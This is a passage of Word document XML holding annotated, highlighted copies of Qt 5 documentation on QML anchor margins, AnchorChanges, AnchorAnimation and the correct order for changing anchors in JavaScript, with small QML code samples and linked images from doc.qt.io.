        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png"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"http://doc.qt.io/qt-5/images/edge2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1065" type="#_x0000_t75" alt="" style="width:165.9pt;height:78.9pt">
            <v:imagedata r:id="rId2328" r:href="rId2329"/>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251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anchor margins only apply to anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; they </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a generic means of applying margins to an</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2330" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If an anchor margin is specified for an edge but the item is not anchored to any item on that edge, the margin is not applied.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00D1065E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1971" w:name="changing-anchors"/>
      <w:bookmarkStart w:id="1972" w:name="_Toc483000957"/>
      <w:bookmarkStart w:id="1973" w:name="_Toc483003948"/>
      <w:bookmarkStart w:id="1974" w:name="_Toc483604300"/>
      <w:bookmarkStart w:id="1975" w:name="_Toc483605520"/>
      <w:bookmarkEnd w:id="1971"/>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Changing Anchors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1972"/>
      <w:bookmarkEnd w:id="1973"/>
      <w:bookmarkEnd w:id="1974"/>
      <w:bookmarkEnd w:id="1975"/>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick provides the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2331" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnchorChanges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type for specifying the </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchors in a state</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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State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name</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"anchorRight"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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AnchorChanges</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target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rect2</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right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parent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right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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>undefined</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//remove the left anchor</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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490E7E" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2332" w:history="1">
        <w:r w:rsidR="00251D49" w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnchorChanges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00251D49" w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be animated using the</w:t>
      </w:r>
      <w:r w:rsidR="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2333" w:history="1">
        <w:r w:rsidR="00251D49" w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnchorAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00251D49" w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</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Transition</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AnchorAnimation</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//animates any AnchorChanges in the corresponding state change</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Anchors can also be </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changed imperatively within JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>these changes should be carefully ordered, or they may produce unexpected outcomes</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t xml:space="preserve">The following </w:t>
      </w:r>
      <w:r w:rsidRPr="00123BBC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t xml:space="preserve"> illustrates the issue:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="998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622"/>
        <w:gridCol w:w="6363"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidTr="00251D49">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com"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>//bad code</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width</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lit"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>50</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parent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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> reanchorToRight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right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parent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right</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ln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>anchors</w:t>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">left </w:t>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>undefined</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251D49">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635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51D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49">
            <w:pPr>
              <w:pStyle w:val="centeralign"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/anchor_ordering_bad.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00251D49">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A2BD2">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A2BD2">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png"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"http://doc.qt.io/qt-5/images/anchor_ordering_bad.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00490E7E">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002230B8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:pict>
                <v:shape id="_x0000_i1066" type="#_x0000_t75" alt="" style="width:4in;height:180.3pt">
                  <v:imagedata r:id="rId2334" r:href="rId2335"/>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251D49">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00251D49" w:rsidRPr="00D1065E" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reanchorToRight</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is called, the function first sets the right anchor. At that point, both left and right anchors are set, and the item will be stretched horizontally to fill its parent. When the left anchor is unset, the new width will remain. Thus when updating anchors within JavaScript, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you should first</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> unset any anchors that are no longer required, and only then set any new anchors that are required, as shown below:</w:t>
      </w:r>
      <w:r w:rsidR="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D1065E" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00D1065E" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example explanation</w:t>
      </w:r>
      <w:r w:rsidR="00D1065E" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1020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3802"/>
        <w:gridCol w:w="6406"/>
      </w:tblGrid>
      <w:tr w:rsidR="00123BBC" w:rsidRPr="00251D49" w:rsidTr="00123BBC">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width</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lit"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>50</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parent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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="00251D49">
